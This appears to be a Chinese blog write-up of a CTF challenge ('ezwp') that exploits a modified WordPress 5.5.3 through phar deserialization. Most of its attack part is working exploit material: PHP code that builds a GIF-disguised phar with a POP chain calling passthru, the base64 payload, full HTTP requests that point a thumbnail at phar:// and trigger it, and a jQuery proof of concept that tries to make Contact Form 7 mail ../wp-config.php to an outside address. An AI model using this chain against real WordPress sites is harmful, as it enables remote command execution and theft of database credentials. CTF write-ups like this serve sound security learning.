文章目录
比赛的时候都没做出来 赛后问了一些思路 回来复现 希望不会鸽掉
1. ezwp
1.1 题目很直白,给了一个附件,第一步当然是确定版本,然后diff源码了
利用插件确定版本,也可直接在网页源代码里看 为5.5.3
<meta name="generator" content="WordPress 5.5.3" />
下面默认左侧是源码,右侧是题目
第一处
第二处
第三处
第四处
第五处
这里一个经验是diff不要只看不一致的,上下文也要读一读
1.2 搜索相关漏洞 学到利用方式、可能的考察点
比赛的时候找错地方了 一直在复现下面那个任意删除的漏洞 傻逼了= =
我们把第五处的代码丢到搜索引擎里去即可
很显然前三篇高度重合,考察的应该就是phar反序列化了。
1.3 大概确定思路是利用phar反序列化
phar反序列化的利用条件:
1. phar文件要能够上传到服务器端。
2. 要有可用的魔术方法作为“跳板”。
3. 文件操作函数的参数可控,且 ':'、'/'、'phar'等特殊字符没有被过滤。
文件操作函数主要是file_*, is_*
fileatime,filectime,file_exists,file_get_contents,file_put_contents,file,filegroup,fopen,fileinode,filemtime,fileowner,fileperms,is_dir,is_executable,is_file,is_link,is_readable,is_writable,is_writeable,parse_ini_file,copy,unlink,stat,readfile
在这道题中,我们可以通过下列方式满足上面三点从而实现反序列化
【DONE】第一点,注册一个账户登陆,然后就可以上传文件了
【NOT YET】第二点,找一个魔术方法
【DONE】第三点,file_exists,和文章中一模一样,拿来用就行
第二点需要学一点前置知识pop链(Property-Oriented Programing,面向属性编程),我们需要从现有环境中寻找一系列的代码调用,然后根据需求构成一组连续的调用链。在控制代码或者程序的执行流程后就能够使用这一组调用链来执行恶意代码。
1.4 寻找pop链
先解释几个魔术方法
__wakeup() //使用unserialize时触发
__sleep() //使用serialize时触发
__destruct() //对象被销毁时触发
__call() //在对象上下文中调用不可访问的方法时触发
__callStatic() //在静态上下文中调用不可访问的方法时触发
__get() //用于从不可访问的属性读取数据
__set() //用于将数据写入不可访问的属性
__isset() //在不可访问的属性上调用isset()或empty()触发
__unset() //在不可访问的属性上使用unset()时触发
__toString() //把类当作字符串使用时触发
__invoke() //当脚本尝试将对象调用为函数时触发
接下来根据参考文章在题目源码里搜索一个调用了foreach的魔术方法,寻找一个内部使用foreach的魔术方法,很幸运,找到了一个
到这里还没有完成,因为我们需要用其他函数触发__toString,如echo print
很遗憾 这个不是很好找 有点多 我开始找别的函数了(懒
我在插件的一个类找到了
1.5 构建phar.phar
好接下来就可以构建一个phar.phar
<?php
class Requests_Utility_FilteredIterator extends ArrayIterator {
protected $callback;
public function __construct($data, $callback) {
parent::__construct($data);
$this->callback = $callback;
}
}
class Ai1ec_Shutdown_Controller {
protected $_preserve;
public function __construct() {
$this->_preserve = new Requests_Utility_FilteredIterator(array('id'), 'passthru');
}
}
@unlink("phar.phar");
$phar = new Phar("phar.phar");
$phar->startBuffering();
$phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>"); //设置stub, 增加gif文件头,伪造文件类型
$o = new Ai1ec_Shutdown_Controller();
$phar->setMetadata($o); //将自定义meta-data存入manifest
$phar->addFromString("test.txt", "test"); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();
?>
生成的phar.phar 的base64为
R0lGODlhPD89IF9fSEFMVF9DT01QSUxFUigpOyA/Pg0K4QAAAAEAAAARAAAAAQAAAAAAqwAAAE86MjU6IkFpMWVjX1NodXRkb3duX0NvbnRyb2xsZXIiOjE6e3M6MTI6IgAqAF9wcmVzZXJ2ZSI7QzozMzoiUmVxdWVzdHNfVXRpbGl0eV9GaWx0ZXJlZEl0ZXJhdG9yIjo2ODp7eDppOjA7YToxOntpOjA7czoyOiJpZCI7fTttOmE6MTp7czoxMToiACoAY2FsbGJhY2siO3M6ODoicGFzc3RocnUiO319fQgAAAB0ZXN0LnR4dAQAAAARPNBfBAAAAAx+f9ikAQAAAAAAAHRlc3R1sGqOVFN2zm1s45gZWbDp3XE9fwIAAABHQk1C
上传发现不成功,想起来是因为作者加了一句过滤php的
这里再引入一个知识点
从PHP版本5.4.0开始,无论PHP.ini文件中的设置如何,都可以使用短标签,网上搜一下,发现WordPress 5.5.3要求PHP版本5.6.20或更高,好那么就可以使用短标签了
<?php
class Requests_Utility_FilteredIterator extends ArrayIterator {
protected $callback;
public function __construct($data, $callback) {
parent::__construct($data);
$this->callback = $callback;
}
}
class Ai1ec_Shutdown_Controller {
protected $_preserve;
public function __construct() {
$this->_preserve = new Requests_Utility_FilteredIterator(array('id'), 'passthru');
}
}
@unlink("phar.phar");
$phar = new Phar("phar.phar");
$phar->startBuffering();
$phar->setStub("GIF89a"."<?= __HALT_COMPILER(); ?>"); //设置stub, 增加gif文件头,伪造文件类型
$o = new Ai1ec_Shutdown_Controller();
$phar->setMetadata($o); //将自定义meta-data存入manifest
$phar->addFromString("test.txt", "test"); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();
?>
再次生成phar.phar 的base64
R0lGODlhPD89IF9fSEFMVF9DT01QSUxFUigpOyA/Pg0K4QAAAAEAAAARAAAAAQAAAAAAqwAAAE86MjU6IkFpMWVjX1NodXRkb3duX0NvbnRyb2xsZXIiOjE6e3M6MTI6IgAqAF9wcmVzZXJ2ZSI7QzozMzoiUmVxdWVzdHNfVXRpbGl0eV9GaWx0ZXJlZEl0ZXJhdG9yIjo2ODp7eDppOjA7YToxOntpOjA7czoyOiJpZCI7fTttOmE6MTp7czoxMToiACoAY2FsbGJhY2siO3M6ODoicGFzc3RocnUiO319fQgAAAB0ZXN0LnR4dAQAAABlxdBfBAAAAAx+f9ikAQAAAAAAAHRlc3QX3jxt9qmlxOkeR85A9LhXEi3jsAIAAABHQk1C
然后我们将phar.phar的后缀改成gif 上传即可
记下上传的post id 为 10
1.6 构造数据包
POST /wp-admin/post.php HTTP/1.1
Host: 10.192.40.169
Content-Length: 697
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.192.40.169
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.192.40.169/wp-admin/post.php?post=10&action=edit
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Cookie: wordpress_=test%7C1607696357%7CPQnY9adPEDA52gdvRAzrYbc8xb0L6Rm2aWnps10qSWY%7C99fa36ea0defc19f304b21364d726ba000ddb71f47fcde27e6bd56124c377960; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_=test%7C1607696357%7CPQnY9adPEDA52gdvRAzrYbc8xb0L6Rm2aWnps10qSWY%7C18e830a54d330079c07a71c89e8aa9d63c2fe19783c426f63288f074f0a9e2eb; wp-settings-time-5=1607525679
Connection: close
_wpnonce=9988adae22&_wp_http_referer=%2Fwp-admin%2Fpost.php%3Fpost%3D10%26action%3Dedit&user_ID=5&action=editpost&originalaction=editpost&post_author=5&post_type=attachment&original_post_status=inherit&referredby=&_wp_original_http_referer=&post_ID=10&meta-box-order-nonce=d7827cca95&closedpostboxesnonce=96643a2a0b&post_title=phar&samplepermalinknonce=e543a6fe01&_wp_attachment_image_alt=123&excerpt=456&content=7890&attachment_url=%2Fwp-content%2Fuploads%2F2020%2F12%2Fphar.gif&original_publish=Update&save=Update&advanced_view=1&comment_status=open&add_comment_nonce=169794d733&_ajax_fetch_list_nonce=bbab8ed067&_wp_http_referer=%2Fwp-admin%2Fpost.php%3Fpost%3D10%26action%3Dedit&post_name=phar&file=Z:\Z
这里主要关注的是最后一个参数file ,然后action=editpost
然后再发一个类似的,主要关注action=editattachment和最后的thumb=
POST /wp-admin/post.php HTTP/1.1
Host: 10.192.40.169
Content-Length: 697
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.192.40.169
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.192.40.169/wp-admin/post.php?post=10&action=edit
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Cookie: wordpress_=test%7C1607696357%7CPQnY9adPEDA52gdvRAzrYbc8xb0L6Rm2aWnps10qSWY%7C99fa36ea0defc19f304b21364d726ba000ddb71f47fcde27e6bd56124c377960; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_=test%7C1607696357%7CPQnY9adPEDA52gdvRAzrYbc8xb0L6Rm2aWnps10qSWY%7C18e830a54d330079c07a71c89e8aa9d63c2fe19783c426f63288f074f0a9e2eb; wp-settings-time-5=1607525679
Connection: close
_wpnonce=9988adae22&_wp_http_referer=%2Fwp-admin%2Fpost.php%3Fpost%3D10%26action%3Dedit&user_ID=5&action=editattachment&originalaction=editpost&post_author=5&post_type=attachment&original_post_status=inherit&referredby=&_wp_original_http_referer=&post_ID=10&meta-box-order-nonce=d7827cca95&closedpostboxesnonce=96643a2a0b&post_title=phar&samplepermalinknonce=e543a6fe01&_wp_attachment_image_alt=123&excerpt=456&content=7890&attachment_url=%2Fwp-content%2Fuploads%2F2020%2F12%2Fphar.gif&original_publish=Update&save=Update&advanced_view=1&comment_status=open&add_comment_nonce=169794d733&_ajax_fetch_list_nonce=bbab8ed067&_wp_http_referer=%2Fwp-admin%2Fpost.php%3Fpost%3D10%26action%3Dedit&post_name=phar&thumb=phar://./wp-content/uploads/2020/12/phar.gif
1.7 有xmlrpc.php
参考博客里有这个文件,赛题中没有。现在假装我有xmlrpc.php,那么应该发一个这样的包
POST /xmlrpc.php HTTP/1.1
Host: 10.192.40.169
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Cookie: wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_=test%7C1607696357%7CPQnY9adPEDA52gdvRAzrYbc8xb0L6Rm2aWnps10qSWY%7C18e830a54d330079c07a71c89e8aa9d63c2fe19783c426f63288f074f0a9e2eb; wp-settings-time-5=1607528069
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 526
<?xml version="1.0" encoding="utf-8"?>
<methodCall>
<methodName>wp.getMediaItem</methodName>
<params>
<param>
<value>
<string>1</string>
</value>
</param>
<param>
<value>
<string>your_name</string>
</value>
</param>
<param>
<value>
<string>your_password</string>
</value>
</param>
<param>
<value>
<int>10</int>
</value>
</param>
</params>
</methodCall>
题目把xmlrpc.php删掉了,我们还能攻击成功吗?答案是可以的。我们需要自己跟一下源码,首先根据博客的说法,我们想调用wp_get_attachment_thumb_file(),那么在vscode里全局搜这玩意,我们发现这个函数会在media.php的image_downsize函数中被调用
1.8 源码跟踪,寻找可控变量
我们在他前面打一个断点,然后手动测试一下常用功能,发现在媒体这边
我这边又传了一个phar.gif,发现可以输出good了,说明我们在上传的时候,服务端执行了一些功能,注意到,每传一次,$id就会自增一次,这可怎么办呢?
好办,只要我们能伪造传入的$id,就可以调用我们的反序列化代码
会过头来看$id怎么控制
还是刚才的image_size函数,可以看到$id传进来后没有在这个函数里变过
function image_downsize( $id, $size = 'medium' ) {
$is_image = wp_attachment_is_image( $id );
...
if ( $intermediate ) {
$img_url = str_replace( $img_url_basename, $intermediate['file'], $img_url );
$width = $intermediate['width'];
$height = $intermediate['height'];
$is_intermediate = true;
} elseif ( 'thumbnail' === $size ) {
die('good');
// Fall back to the old thumbnail.
$thumb_file = wp_get_attachment_thumb_file( $id );
...
}
}
然后我们看调用image_size的函数为wp_get_attachment_image_src,这里写了个$attachment_id,$post传进来也没有做过任何变动,我们继续跟
function wp_get_attachment_image_src( $attachment_id, $size = 'thumbnail', $icon = false ) {
// Get a thumbnail or intermediate image if there is one.
$image = image_downsize( $attachment_id, $size );
...
}
在async-upload.php中,我们找到了调用点,这个函数需要多注意一下,因为这边对$id变量进行了赋值
if ( isset( $_REQUEST['attachment_id'] ) && intval( $_REQUEST['attachment_id'] ) && $_REQUEST['fetch'] ) {
$id = intval( $_REQUEST['attachment_id'] );
var_dump($id);
$post = get_post( $id );
if ( 'attachment' !== $post->post_type ) {
wp_die( __( 'Invalid post type.' ) );
}
// print_r($post);
switch ( $_REQUEST['fetch'] ) {
case 3:
$thumb_url = wp_get_attachment_image_src( $id, 'thumbnail', true );
if ( $thumb_url ) {
echo '<img class="pinkynail" src="' . esc_url( $thumb_url[0] ) . '" alt="" />';
}
if ( current_user_can( 'edit_post', $id ) ) {
echo '<a class="edit-attachment" href="' . esc_url( get_edit_post_link( $id ) ) . '" target="_blank">' . _x( 'Edit', 'media item' ) . '</a>';
} else {
echo '<span class="edit-attachment">' . _x( 'Success', 'media item' ) . '</span>';
}
// Title shouldn't ever be empty, but use filename just in case.
$file = get_attached_file( $post->ID );
$title = $post->post_title ? $post->post_title : wp_basename( $file );
echo '<div class="filename new"><span class="title">' . esc_html( wp_html_excerpt( $title, 60, '…' ) ) . '</span></div>';
break;
case 2:
add_filter( 'attachment_fields_to_edit', 'media_single_attachment_fields_to_edit', 10, 2 );
echo get_media_item(
$id,
array(
'send' => false,
'delete' => true,
)
);
break;
default:
add_filter( 'attachment_fields_to_edit', 'media_post_single_attachment_fields_to_edit', 10, 2 );
echo get_media_item( $id );
break;
}
exit;
}
看到这个函数很开心,因为绝大部分东西都是可控的,我们只要控制attachment_id为10,fetch为3就好了!
静态的看完,我们动态抓包整一波
漏洞产生位置在wp-includes/post.php
1.9 getshell
我们希望调用phar://../wp-content/uploads/2020/12/phar.gif,那么需要再发一次包重新设置thumb,发完之后调用漏洞点getshell!
1.10 总结
本题主要是源码审计,作者的思路也是phar反序列化,只是没有在上传的时候过滤得太严格,导致了非预期解,作者的预期解法是使用自己修改过的contact-form-7进行权限提升,将phar写入/tmp/1.log,然后利用上面的漏洞反序列化执行命令。复现的时候最困难的就是绕过meta_input,他会把我poc中的meta_input过滤掉,导致没法写入form表单中。出题人的提示是利用cf7的代码,但我跟踪了很久都没法用poc.js打,可能还有其他的途径。
var settings = {
"async": true,
"crossDomain": true,
"url": "http://10.192.40.169/wp-admin/post.php?post=36",
"method": "POST",
"data": {
"_wpnonce": "d0fa0abd0a",
"_wp_http_referer": "%2Fwp-admin%2Fpost-new.php",
"user_ID": "5",
"action": "post",
"originalaction": "editpost",
"post_author": "5",
"post_type": "wpcf7_contact_form",
"original_post_status": "auto-draft",
"auto_draft": "",
"post_title": "xxx",
"content": "test",
"wp-preview": "",
"hidden_post_status": "draft",
"post_status": "draft",
"hidden_post_password": "",
"hidden_post_visibility": "public",
"visibility": "public",
"post_password": "",
"mm": "12",
"jj": "22",
"_thumbnail_id": "-1",
"advanced_view": "1",
"comment_status": "open",
"ping_status": "open",
"post_name": "",
"meta_input[_mail][subject]": "test \"[your-subject]\"",
"meta_input[_mail][sender]": "5",
"meta_input[_mail][recipient]": "213123@qq.com",
"meta_input[_mail][body]": "From: [your-name] <[your-email]>\\nSubject: [your-subject]\\n\\nMessage Body:\\n[your-message]\\n\\n-- \\n",
"meta_input[_mail][additional_headers]": "Reply-To: [your-email]",
"meta_input[_mail][attachments]": "../wp-config.php",
"meta_input[_mail][use_html]": "false",
"meta_input[_mail][exclude_blank]": "false",
"meta_input[_form]": "<label> Your Name (required)\n [text* your-name] </label>\n\n<label> Your Email (required)\n [email* your-email] </label>\n\n<label> Subject\n [text your-subject] </label>\n\n<label> Your Message\n [textarea your-message] </label>\n\n[submit \\\"Send\\\"]",
"meta_input._form": "<label> Your Name (required)\n [text* your-name] </label>\n\n<label> Your Email (required)\n [email* your-email] </label>\n\n<label> Subject\n [text your-subject] </label>\n\n<label> Your Message\n [textarea your-message] </label>\n\n[submit \\\"Send\\\"]",
"meta_input._form.body": "<label> Your Name (required)\n [text* your-name] </label>\n\n<label> Your Email (required)\n [email* your-email] </label>\n\n<label> Subject\n [text your-subject] </label>\n\n<label> Your Message\n [textarea your-message] </label>\n\n[submit \\\"Send\\\"]",
"file[_form]": "<label> Your Name (required)\n [text* your-name] </label>\n\n<label> Your Email (required)\n [email* your-email] </label>\n\n<label> Subject\n [text your-subject] </label>\n\n<label> Your Message\n [textarea your-message] </label>\n\n[submit \\\"Send\\\"]",
"-meta_input[_form]": "<label> Your Name (required)\n [text* your-name] </label>\n\n<label> Your Email (required)\n [email* your-email] </label>\n\n<label> Subject\n [text your-subject] </label>\n\n<label> Your Message\n [textarea your-message] </label>\n\n[submit \\\"Send\\\"]",
"_meta_input[_form]": "<label> Your Name (required)\n [text* your-name] </label>\n\n<label> Your Email (required)\n [email* your-email] </label>\n\n<label> Subject\n [text your-subject] </label>\n\n<label> Your Message\n [textarea your-message] </label>\n\n[submit \\\"Send\\\"]",
"meta_input[_form][body]": "<label> Your Name (required)\n [text* your-name] </label>\n\n<label> Your Email (required)\n [email* your-email] </label>\n\n<label> Subject\n [text your-subject] </label>\n\n<label> Your Message\n [textarea your-message] </label>\n\n[submit \\\"Send\\\"]",
"wpcf7.meta_input[_form]": "<label> Your Name (required)\n [text* your-name] </label>\n\n<label> Your Email (required)\n [email* your-email] </label>\n\n<label> Subject\n [text your-subject] </label>\n\n<label> Your Message\n [textarea your-message] </label>\n\n[submit \\\"Send\\\"]",
"wpcf7.form": "<label> Your Name (required)\n [text* your-name] </label>\n\n<label> Your Email (required)\n [email* your-email] </label>\n\n<label> Subject\n [text your-subject] </label>\n\n<label> Your Message\n [textarea your-message] </label>\n\n[submit \\\"Send\\\"]",
"form": "<label> Your Name (required)\n [text* your-name] </label>\n\n<label> Your Email (required)\n [email* your-email] </label>\n\n<label> Subject\n [text your-subject] </label>\n\n<label> Your Message\n [textarea your-message] </label>\n\n[submit \\\"Send\\\"]",
"form.body": "<label> Your Name (required)\n [text* your-name] </label>\n\n<label> Your Email (required)\n [email* your-email] </label>\n\n<label> Subject\n [text your-subject] </label>\n\n<label> Your Message\n [textarea your-message] </label>\n\n[submit \\\"Send\\\"]",
"_form": "<label> Your Name (required)\n [text* your-name] </label>\n\n<label> Your Email (required)\n [email* your-email] </label>\n\n<label> Subject\n [text your-subject] </label>\n\n<label> Your Message\n [textarea your-message] </label>\n\n[submit \\\"Send\\\"]",
"wpcf7-form": "<label> Your Name (required)\n [text* your-name] </label>\n\n<label> Your Email (required)\n [email* your-email] </label>\n\n<label> Subject\n [text your-subject] </label>\n\n<label> Your Message\n [textarea your-message] </label>\n\n[submit \\\"Send\\\"]"
}
}
jQuery.ajax(settings).done(function (response) {
console.log(response);
});
1万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
